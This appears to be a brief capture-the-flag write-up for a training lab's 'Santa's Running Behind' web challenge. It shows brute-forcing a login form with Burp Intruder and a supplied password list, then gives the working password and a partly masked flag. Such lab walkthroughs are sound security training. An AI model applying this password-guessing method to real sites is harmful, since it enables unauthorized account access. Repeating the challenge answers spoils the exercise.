Comment on page
[Day 4] Santa's Running Behind
{Web Exploitation = Fuzzing}
Accessing the site reveals a login form as shown below.

The following was the password list provided to us.
christmas
elves!
santa
festive
joy123
myrrh!
yuletide
presents
candy
tidings
cookie
cookies
biscuits!
snowball
snowball123
First, capture a dummy login request on burp and send it to the intruder


Mark the payload positions as shown below.

Paste the given wordlist under payload set 1 and start the attack.

After the attack has been completed. It's obvious that one request has a longer response and a status code of
302
AKA redirect.
Trying to login with
santa:cookie
succeeds and we are able to see Santa's Itinerary.What valid password can you use to access the "santa" account?
- cookie

What is the flag in Santa's itinerary?
- THM{SANTA_*******}
Last modified 1yr ago